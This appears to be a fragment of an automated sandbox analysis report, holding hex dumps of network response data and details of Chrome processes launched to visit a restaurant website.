                                                                                                                                                    2024-10-01 04:27:02 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:27:03 UTC16384INData Raw: 80 95 04 ed 25 74 b5 37 c9 0c df 41 91 4a e4 03 9a 21 5b 87 49 88 86 04 39 68 b5 3e 6b 6f a0 d7 cf 0b d7 08 af 2b 3b ea 67 59 9c f4 45 23 0d 70 06 49 d0 c7 3d 0c 70 5a 19 7d 58 b1 29 b5 15 56 73 ec 9e 93 26 d3 de 7c b8 34 32 5c 98 f9 96 9a 76 ca 51 1a 89 ae 5a 56 e5 e5 8c 42 e6 09 e1 5a 5d fa 90 2b d8 35 0b c0 ee c9 de c0 f5 f7 1e 61 0f 69 e4 32 a1 b2 22 d6 5a fb 48 1f 8f 78 77 3d d6 b3 eb a7 95 49 a0 dd 79 ab aa c8 da af 14 1d 38 4c d3 85 59 b1 06 43 8e d3 50 3b f0 07 8d 49 62 59 ba 5f 76 36 83 22 ae 7c bc bf 42 6a f2 c7 9b b4 ab f3 73 37 ae ad d8 8b 7c a4 87 8d e8 70 eb ac 15 0b 3a 6e 2e ee 67 77 40 1e 26 1c 44 4c 35 31 dc 1d 31 21 3f 52 f9 67 d4 36 e7 d9 ce d0 cd df 9f 2b 3f 47 33 cd f4 ed 2a ad 52 d8 33 e8 a9 9b 80 b3 4b 5f 4e a9 25 cd 50 2b 11 33 1b
                                                                                                                                                    Data Ascii: %t7AJ![I9h>ko+;gYE#pI=pZ}X)Vs&|42\vQZVBZ]+5ai2"ZHxw=Iy8LYCP;IbY_v6"|Bjs7|p:n.gw@&DL511!?Rg6+?G3*R3K_N%P+3
                                                                                                                                                    2024-10-01 04:27:03 UTC15252INData Raw: 61 b5 ff 00 db c6 42 e2 1f 4d 21 9b 2e a0 ab 30 fc 72 4c 1f d1 07 96 1e 08 8d ef ea 61 f4 00 47 a8 b1 6d 73 97 af 8c 5b 02 84 75 21 db 32 a2 78 86 9c cc 0f 39 c6 7e 42 bb 38 21 bf 11 1f 2d f2 47 6e 50 8c 8d ad 7e 2d 5d 71 98 4b 36 70 94 6e b8 95 ec 2d 92 cf 21 4e 23 5b 81 76 ca a4 1b 56 73 af 6c 30 f9 67 c8 61 b1 a7 ca 44 5b 89 9c cc de b7 0a ac dc aa b0 32 5a e3 8d c7 cd 77 61 4d f0 da 4c 36 98 6e 68 6c b0 c6 36 18 56 c8 c2 c8 bc 81 ab db fd 47 b7 f1 69 af ef 77 b6 b0 fc 7f d6 bf 7d 8f f7 20 9a ff 00 ee 81 e3 6c 42 61 33 51 79 13 5c f8 e1 ae 1a a7 c4 21 a8 43 50 8d 58 86 b0 01 f4 3e f3 12 a3 86 1b 18 9f eb fc ac 7e 67 19 14 11 f1 86 99 99 18 b8 7e 7a e7 f0 ff 00 4a bf b4 02 54 c5 0a 3a 58 96 80 20 e5 8a c1 08 be ea 39 16 d7 00 de 9c 5b d4 fa 1f 52 c2 6d
                                                                                                                                                    Data Ascii: aBM!.0rLaGms[u!2x9~B8!-GnP~-]qK6pn-!N#[vVsl0gaD[2ZwaML6nhl6VGiw} lBa3Qy\!CPX>~g~zJT:X 9[Rm
                                                                                                                                                    2024-10-01 04:27:03 UTC16384INData Raw: 1e d3 ce 7c fa 0f 41 0c 38 9f 8c fc 67 e3 3f 19 e2 08 3d 0e 67 9f 41 fc 0c 3e 8b 98 61 f4 19 fe 23 f8 08 31 3c 4f 18 86 6d 67 2a 5c 83 8c af 2c 92 67 fa 7f ad bc 63 41 98 22 e2 19 e6 0f 4f 33 cf a0 f4 39 8d 9f 45 8b 8c 37 18 71 e9 ff da 00 08 01 01 00 01 05 00 6c 53 19 9a d2 07 9c fa 63 f9 0f fa a3 d7 de 2a 09 66 d0 05 cb b4 da ea 46 e4 a7 ab 4a 15 fa 6a ac 23 40 22 af 53 50 36 e9 73 15 f5 b5 55 1f af 57 89 a6 b5 0f f8 ea 89 fd 65 c2 68 a7 26 eb ea 79 5e b0 d7 96 59 5d b2 b7 1a ca d5 35 d3 e7 4c 26 29 2e cb b3 39 d7 ae 81 43 b5 e6 82 35 6a 2b 0b f1 15 00 e1 51 44 f1 0c 68 d1 a3 c6 8c 63 18 f6 01 2f ed 35 aa 97 7d 86 b1 2e ee f6 2d 85 b6 6d 9f aa 61 d7 14 cb 47 04 5f 8c d7 af e1 b6 ac f9 8d 35 07 86 95 03 e6 22 26 c3 a9 6b 89 15 fc 22 db ee af 9a 54 c1 af
                                                                                                                                                    Data Ascii: |A8g?=gA>a#1<Omg*\,gcA"O39E7qlSc*fFJj#@"SP6sUWeh&y^Y]5L&).9C5j+QDhc/5}.-maG_5"&k"T
                                                                                                                                                    2024-10-01 04:27:03 UTC16384INData Raw: bd 72 47 10 21 86 62 11 31 35 41 b6 ee c2 b5 4d de 97 b0 34 bf 6d af f0 be 96 cf 06 ee 35 c1 4e be ce 75 e3 0e 7f bd c3 f1 c7 9a c7 e2 7c 3a fb 37 bf 5e 09 7d bf c5 29 f1 5d f6 89 a7 77 eb eb f6 17 9a 69 eb 29 36 37 d8 3b 13 ad ae 3d bd 15 66 20 f4 02 01 31 2d a8 38 42 2a b7 77 7d 7b 0b 7a de c4 58 2b 28 f3 4c 37 57 b7 a2 e3 5f 63 65 3f 53 67 78 9d 56 b1 f9 bf aa f8 19 99 99 f4 38 99 9e 20 c7 a1 19 0c be 3a 86 e3 af a4 df 9f 5a 32 80 78 ee 07 e1 b2 bc a1 49 c4 10 26 26 04 22 32 06 87 5d 65 9a 6a f3 56 b7 d4 87 a9 a7 65 07 55 7e aa 59 6b f0 eb 3b 12 4d 9d 85 2a c3 51 6d 97 ea 0a ec b6 b2 cd 6d 3c ce f1 ae ea d3 5c a4 fd 71 13 ab a7 5e ad de aa 8b ab be 8a fe 1d 9e be 9b aa af 55 69 a9 13 09 52 72 5b ad ae 85 d0 ec 13 79 74 ee 4d a5 6e f5 81 a7 b5 b4 9b 3b
                                                                                                                                                    Data Ascii: rG!b15AM4m5Nu|:7^})]wi)67;=f 1-8B*w}{zX+(L7W_ce?SgxV8 :Z2xI&&"2]ejVeU~Yk;M*Qmm<\q^UiRr[ytMn;
                                                                                                                                                    2024-10-01 04:27:03 UTC16384INData Raw: d7 54 cd b7 c9 07 5d 61 49 73 4b 3a 3d 1b 9f 76 ef ae ea 9e ea dd 6d ab eb 1c ac b6 8e 02 aa 9c 3f 60 d9 6a 54 11 79 f3 d7 d4 6c b7 bc 00 5b d7 d5 f2 3f 68 fc f6 34 93 95 9b 2d 96 af c9 b0 f0 d1 a7 48 ec 4a ea 2a db 9a ff 00 19 bf 5d e9 3a 84 ad d6 da 56 d7 ac 2d 9b 2c b5 36 c1 e1 b0 bf 93 e9 36 51 6c f1 47 60 da 7a bf 71 65 a9 ba 3e 7a b5 76 7b 76 bb ad ce b5 f4 ba 2f bf b5 da 5f f1 ab 28 65 de d6 2f ac 86 72 c4 f7 8c 31 28 fe ff 00 a8 cc ff 00 ae da cf dc 93 6c 5f 7d 74 0e 8a 83 02 d2 a2 ff 00 f7 3a c6 ce a0 3e 7b 3f 1b b4 36 2d 7e ca e7 7d 5b ee 63 f6 d6 ce b1 33 32 93 f9 13 e6 03 09 94 1f 3d 87 72 fb 55 f5 94 1b 35 35 6d 16 cd 5a 5c 26 f6 b1 da ab fe 30 2c 70 5a 85 06 ca fb 2b 1a bd 7d 27 c9 d6 45 9b 39 50 c0 2d 3d 7e ed 74 b5 7d 80 ec 1f a6 6c a9 3f
                                                                                                                                                    Data Ascii: T]aIsK:=vm?`jTyl[?h4-HJ*]:V-,66QlG`zqe>zv{v/_(e/r1(l_}t:>{?6-~}[c32=rU55mZ\&0,pZ+}'E9P-=~t}l?
                                                                                                                                                    2024-10-01 04:27:03 UTC16336INData Raw: 83 91 9c 0c 5a c4 51 18 8a e5 9b 78 96 5e 49 f9 1d a7 51 d7 57 b9 ad d9 f6 ad 56 8a 10 22 a8 33 e1 36 9b c5 94 58 b6 31 0b 5d c6 2b 58 b3 f2 c7 fc 76 ae d1 bb eb d7 02 94 59 4b 80 49 39 26 ff 00 15 98 d9 01 bd a8 e3 cc 36 45 aa cc 83 2a e5 02 bb d7 c6 56 e6 bb 36 3c 58 ec a6 55 fe 4a 8e 0a e4 30 e4 44 7a f8 2a d6 6f 36 53 f0 ce 44 01 88 cf 2f d4 f9 89 d7 b5 03 8d 95 89 7e 65 5d 9a 54 2a ec b2 13 68 b4 17 a4 f7 96 5d 42 87 dd d7 49 bb d8 bd a7 5b ad b3 68 26 b7 11 af d7 aa ce 55 a4 6d a1 64 a5 b9 57 d8 6a a5 ee bc 5a 57 c5 8f c3 58 8c d5 08 6d aa 7c c9 0d 86 73 72 40 88 a1 96 ca 9e b1 c4 82 1c 34 28 32 86 3f 53 d8 ee ee 3e e6 97 45 4f 6d f6 db 36 ab e8 aa f8 b4 5d 39 9f 87 88 1e 26 66 66 66 66 66 60 02 59 6e 07 d8 51 df 4a 9b 45 a3 73 eb 1a 7b 23 6f ea 9b
                                                                                                                                                    Data Ascii: ZQx^IQWV"36X1]+XvYKI9&6E*V6<XUJ0Dz*o6SD/~e]T*h]BI[h&UmdWjZWXm|sr@4(2?S>EOm6]9&fffff`YnQJEs{#o
                                                                                                                                                    2024-10-01 04:27:03 UTC48INData Raw: 78 15 b7 31 ad 61 17 60 89 5d c2 d9 6f 82 cb 2c 6f f1 b2 58 83 25 83 54 30 96 71 82 fe 30 5a ae 2e 29 2b 1f 95 88 18 0a 58 1d 8a 0f 26 1c 59 0f
                                                                                                                                                    Data Ascii: x1a`]o,oX%T0q0Z.)+X&Y
                                                                                                                                                    2024-10-01 04:27:03 UTC16384INData Raw: 9e b5 cb 2d 23 cd df 90 a6 e7 44 ad 79 9b d5 e6 be cd 68 6e 29 cb e4 e4 4a b2 c3 5f c5 0b 60 e3 31 54 88 08 8e ed 5b 55 b1 f1 9b 9b f6 1c ab 23 70 e6 68 a7 8c a9 4a 95 38 8f b3 80 76 41 af f6 f0 0b 06 94 ae 02 78 0d 86 03 60 a0 6b 18 9a ed 30 b8 61 b2 c5 54 06 8b 51 40 af 7a 5b ac b7 b5 9d be 8e cf 70 7a df ab d7 d7 0d 4e cd 5f d0 4e e7 a1 af b3 54 db b7 4e ed 8d 6a 77 17 80 47 d6 41 01 97 27 25 eb b7 ec eb 9a 9b 6b dc af b4 eb 05 89 55 bb 3d 15 fd 5f 6b 4f 69 55 95 07 16 f5 a2 7d 86 96 a9 ba 9b 1a a7 47 21 9f 19 e5 f2 46 a5 b2 13 cb 26 26 31 08 f0 ca 62 6b 90 05 85 88 c2 cd ed af 0c 08 1d b7 6f 91 af aa d7 9f f1 d4 2d b0 2a b3 f9 32 bd 17 0b b3 b0 6d 3e 82 25 6d 64 7b 97 5d 4e 5a 15 c4 16 b2 44 b0 38 c6 26 7f 81 97 7f 7d 4f 7b 7f b0 82 1f 66 f4 5f 71 ee
                                                                                                                                                    Data Ascii: -#Dyhn)J_`1T[U#phJ8vAx`k0aTQ@z[pzN_NTNjwGA'%kU=_kOiU}G!F&&1bko-*2m>%md{]NZD8&}O{f_q


                                                                                                                                                    Click to jump to process

                                                                                                                                                    Click to jump to process

                                                                                                                                                    Click to jump to process

                                                                                                                                                    Target ID:0
                                                                                                                                                    Start time:00:26:14
                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                                    Imagebase:0x7ff76e190000
                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:low
                                                                                                                                                    Has exited:false

                                                                                                                                                    Target ID:2
                                                                                                                                                    Start time:00:26:19
                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1992,i,16327888069713662135,12520818164670430321,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                    Imagebase:0x7ff76e190000
                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:low
                                                                                                                                                    Has exited:false

                                                                                                                                                    Target ID:3
                                                                                                                                                    Start time:00:26:21
                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.afghanhayatrestaurant.com.au/"
                                                                                                                                                    Imagebase:0x7ff76e190000
                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:low
                                                                                                                                                    Has exited:true

                                                                                                                                                    No disassembly